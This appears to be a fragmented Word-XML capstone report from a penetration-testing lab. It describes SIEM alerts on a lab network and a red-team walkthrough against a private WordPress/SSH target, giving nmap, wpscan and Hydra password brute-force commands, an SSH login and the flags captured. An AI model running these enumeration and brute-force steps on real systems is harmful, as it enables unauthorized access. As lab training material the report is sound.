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iinf74dmbg9n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Blue Team: Summary of Operations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ejcvqc1drs9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Table of Contents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Network Topology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Description of Targets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Monitoring the Targets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Patterns of Traffic &amp; Behavior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Suggestions for Going Further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i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a48ce60cl8u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Network Topology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following machines were identified on the network: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Operating System</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Linux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Web Server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IP Address</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 192.168.1.110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Target 2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Operating System</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Linux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Web Server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IP Address</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 192.168.1.115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Capstone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Operating System</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Linux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Web Server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IP Address</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 192.16.8.1.105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ELK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Operating System</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Linux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SIEM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IP Address</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 192.168.1.100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Kali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Operating System</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Linux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Attack Machine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IP Address</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 192.168.1.90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ML-REFVM-684427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Operating System</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Windows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NATSwitch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IP Address</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 192.168.1.1</w:t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ivhy5p9rnaj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i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cb88c53aucgf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Description of Targets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target of this attack was: Target1 192.168.1.110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Target 1 is an Apache web server and has SSH enabled, so ports 80 and 22 are possible ports of entry for attackers. As such, the following alerts have been implemented:</w:t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wvb98h7306t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Monitoring the Targets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Traffic to these services should be carefully monitored. To this end, we have implemented the alerts below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8hptkenao564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Excessive HTTP Errors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[Excessive HTTP Errors]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is implemented as follows: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Metric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http.response.status_code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Threshold</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 400 for the last 5 minutes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Vulnerability Mitigated</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Brute Force Attacks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Reliability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: High reliability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lqq0p7wyznb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HTTP Request Size Monitor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[HTTP Request Size Monitor]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is implemented as follows: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Metric</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: http.request.bytes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Threshold</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 3500 for the last 1 minute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Vulnerability Mitigated</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: DOS Attacks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Reliability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: High reliability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7112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i3c2vknb48b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7bonrdsdrpc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2ve9kex23dj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CPU Usage Monitor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Alert 3 is implemented as follows:</w:t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Metric</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: system.process.cpu.total.pct</w:t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Threshold</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 0.5 for the last 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C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Vulnerability Mitigated</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Excessive CPU Usage, Resource Usage Issues</w:t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Reliability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Medium reliability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698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dnnb5op85mxp" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team: Summary of Operations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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2pi85hy4fv5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Table of Contents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Exposed Services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Critical Vulnerabilities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Exploitation</w:t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pacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tm4q0g779lrj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Exposed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Nmap scan results for each machine reveal the below services and OS details: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$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV 192.168.1.110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9050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="5943600" cy="1917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175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scan identifies the services below as potential points of entry:</w:t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  <w:t xml:space="preserve">Port 22 / SSH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  <w:t xml:space="preserve">Port 80 / http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  <w:t xml:space="preserve">Port 111 / rpcbind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following vulnerabilities were identified on each target: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5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Port 22 is Open, this gives us the ability to ssh into the machine with discovered credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 80 is Open, this gives us access to the web server via the web browser.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fhj2pbebyyw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Exploitation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Red Team was able to penetrate Target 1 and retrieve the following confidential data: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First, we ran an enumeration scan to uncover the users and hidden directories.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Dirbuster showed used the document containing flag1 </w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="5943600" cy="2387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Target1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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flag1.txt:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{b9bbcb33e11b80be759c4e844862482d}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05A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4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i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute Force Directory discovery to identify service.html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05C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i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress Security Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4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wpscan --url </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.1.110/wordpress</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --wp-content-dir -at -eu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9050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="4233863" cy="2205137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2205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060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i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra (Brute Force Password Cracking)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76" w:lineRule="auto"/>
        <w:ind w:left="2160" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l michael -P /root/Downloads/rockyou.txt ssh://192.168.1.110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9050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="5943600" cy="1841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4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flag2.txt: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{fc3fd58dcdad9ab23faca6e9a36e581c}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064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065">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4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i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH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3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh michael@192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="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3035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192.168.1.110/wordpress" TargetMode="External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